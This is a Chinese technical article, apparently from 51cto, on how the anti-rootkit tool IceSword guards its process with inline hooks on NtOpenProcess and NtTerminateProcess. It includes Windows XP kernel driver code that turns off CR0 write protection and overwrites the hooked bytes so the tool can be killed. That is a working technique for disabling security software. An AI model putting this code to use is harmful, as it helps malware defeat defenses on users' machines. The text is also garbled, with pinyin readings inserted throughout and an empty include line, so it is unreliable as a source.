IceSword的驅(qū)動(dòng)對(duì)其自身進(jìn)程做了保護(hù),使惡意程序終止不了他。IceSword沒(méi)有用HOOK SSDT的方法,不過(guò)也沒(méi)用什么太變態(tài)的方法,而是Inline Hook了NtOpenProcess、NtTerminateProcess幾個(gè)函數(shù),即修改函數(shù)前5個(gè)字節(jié),jmp到他自定義處理函數(shù)例程里。
終止采用這類保護(hù)方法的進(jìn)程,可以使用暴力的PspTerminateProcess方法,PspTerminateProcess函數(shù)未導(dǎo)出,需要我們自己窮舉特征碼搜索來(lái)定位,或者硬編碼之。當(dāng)然,我們還可以恢復(fù)IceSword的Inline hook,還原被IceSword掛鉤過(guò)的NtOpenProcess、NtTerminateProcess函數(shù),然后在用戶態(tài)上使用普通的終止進(jìn)程的方法就可以終止他了。這里給出了第二中方法的具體代碼,不過(guò)由于此篇文章出于科普目的,代碼就寫得馬虎點(diǎn)了,僅適用于Windows XP,因?yàn)槿SDT對(duì)應(yīng)的函數(shù)索引號(hào)用的硬編碼,說(shuō)明問(wèn)題而已。NtTerminateProcess未導(dǎo)出,大家可以自己改成通過(guò)讀取ntdll.dll動(dòng)態(tài)通用的獲得索引號(hào)的方法,方法網(wǎng)上有公開,需要的人就自己動(dòng)點(diǎn)手吧。
CODE:
#include
#define DWORD unsigned long
unsigned char OldCode[5]="\x68\xc4\x00\x00\x00";
unsigned char OldCode2[5]="\x8b\xff\x55\x8b\xec";
#pragma pack(1)
typedef struct ServiceDescriptorEntry {
unsigned int *ServiceTableBase;
unsigned int *ServiceCounterTableBase;
unsigned int NumberOfServices;
unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()
__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;
NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING
theRegistryPath )
{
DWORD OpAddr,OpAddr2;
OpAddr=*(KeServiceDescriptorTable.ServiceTableBase + 0x7A);
OpAddr2=*(KeServiceDescriptorTable.ServiceTableBase + 0x101);
_asm
{
CLI
MOV eax, CR0
AND eax, NOT 10000H
MOV CR0, eax
pushad
mov edi, OpAddr
mov eax, dword ptr OldCode[0]
mov [edi], eax
mov al, byte ptr OldCode[4]
mov [edi+4], al
mov edi, OpAddr2
mov eax, dword ptr OldCode2[0]
mov [edi], eax
mov al, byte ptr OldCode2[4]
mov [edi+4], al
popad
MOV eax, CR0
OR eax, 10000H
MOV CR0, eax
STI
}
return STATUS_SUCCESS;
} |
責(zé)任編輯 趙毅 zhaoyi#51cto.com TEL:(010)68476636-8001
